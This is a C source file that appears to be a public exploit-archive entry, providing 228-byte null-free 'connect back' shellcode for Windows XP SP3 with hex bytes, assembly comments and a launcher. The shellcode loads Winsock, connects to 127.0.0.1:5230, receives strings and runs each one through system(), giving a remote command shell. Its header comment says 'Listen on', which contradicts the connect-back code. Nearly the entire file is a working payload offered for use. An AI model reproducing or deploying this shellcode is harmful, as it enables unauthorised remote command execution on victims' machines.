/*------------------------------------------------------------------------ Title...................Windows XP SP3 EN Null-free Connect Back Shellcode 228 Bytes Release Date............12/7/2010 Tested On...............Windows XP SP3 EN ------------------------------------------------------------------------ Author..................John Leitch Site....................http://www.johnleitch.net/ Email...................john.leitch5@gmail.com ------------------------------------------------------------------------*/ int main(int argc, char *argv[]) { // Listen on 127.0.0.1:5230 char* shellcode= "\x33\xDB" // xor ebx,ebx "\xC7\x45\x08\x40\xAE\x80\x7C" // mov dword ptr [argc],7C80AE40h "\xC7\x45\x04\x7B\x1D\x80\x7C" // mov dword ptr [ebp+4],7C801D7Bh "\x68\x64\x6C\x6C\x01" // push 16C6C64h "\xD0\x6C\x24\x03" // shr byte ptr [esp+3],1 "\x68\x6B\x33\x32\x2E" // push 2E32336Bh "\x68\x77\x73\x6F\x63" // push 636F7377h "\x54" // push esp "\xFF\x55\x04" // call dword ptr [ebp+4] "\x8B\xF0" // mov esi,eax "\x53" // push ebx "\xC6\x04\x24\x75" // mov byte ptr [esp],75h "\xC6\x44\x24\x01\x70" // mov byte ptr [esp+1],70h "\x68\x74\x61\x72\x74" // push 74726174h "\x68\x57\x53\x41\x53" // push 53415357h "\x54" // push esp "\x56" // push esi "\xFF\x55\x08" // call dword ptr [argc] "\x83\xEC\x7F" // sub esp,7Fh "\x83\xEC\x7F" // sub esp,7Fh "\x83\xEC\x7F" // sub esp,7Fh "\x83\xEC\x13" // sub esp,13h "\x54" // push esp "\x54" // push esp "\xFF\xD0" // call eax "\x53" // push ebx "\xC6\x04\x24\x65" // mov byte ptr [esp],65h "\xC6\x44\x24\x01\x74" // mov byte ptr [esp+1],74h "\x68\x73\x6F\x63\x6B" // push 6B636F73h "\x54" // push esp "\x56" // push esi "\xFF\x55\x08" // call dword ptr [argc] "\x53" // push ebx "\x6A\x01" // push 1 "\x6A\x02" // push 2 "\xFF\xD0" // call eax "\x89\x45\xFC" // mov dword ptr [ebp-4],eax "\x68\x65\x63\x74\x01" // push 1746365h "\xD0\x6C\x24\x03" // shr byte ptr [esp+3],1 "\x68\x63\x6F\x6E\x6E" // push 6E6E6F63h "\x54" // push esp "\x56" // push esi "\xFF\x55\x08" // call dword ptr [argc] "\x6A\x01" // push 1 "\x6A\x7F" // push 7Fh "\xC6\x44\x24\x03\x01" // mov byte ptr [esp+3],1 "\x68\x02\x01\x14\x6E" // push 6E140102h "\xD0\x6C\x24\x01" // shr byte ptr [esp+1],1 "\x8B\xFC" // mov edi,esp "\x6A\x10" // push 10h "\x57" // push edi "\xFF\x75\xFC" // push dword ptr [ebp-4] "\xFF\xD0" // call eax "\x53" // push ebx "\x68\x72\x65\x63\x76" // push 76636572h "\x54" // push esp "\x56" // push esi "\xFF\x55\x08" // call dword ptr [argc] "\x53" // push ebx "\x6A\x7F" // push 7Fh "\x57" // push edi "\xFF\x75\xFC" // push dword ptr [ebp-4] "\xFF\xD0" // call eax "\x53" // push ebx "\xC6\x04\x24\x6C" // mov byte ptr [esp],6Ch "\xC6\x44\x24\x01\x6C" // mov byte ptr [esp+1],6Ch "\x68\x72\x74\x2E\x64" // push 642E7472h "\x68\x6D\x73\x76\x63" // push 6376736Dh "\x54" // push esp "\xFF\x55\x04" // call dword ptr [ebp+4] "\x53" // push ebx "\xC6\x04\x24\x65" // mov byte ptr [esp],65h "\xC6\x44\x24\x01\x6D" // mov byte ptr [esp+1],6Dh "\x68\x73\x79\x73\x74" // push 74737973h "\x54" // push esp "\x50" // push eax "\xFF\x55\x08" // call dword ptr [argc] "\x57" // push edi "\xFF\xD0" // call eax "\xEB\xBB" // jmp recv_loop (4010B3h) ; printf("shellcode length: %i", strlen(shellcode)); __asm jmp shellcode return 0; }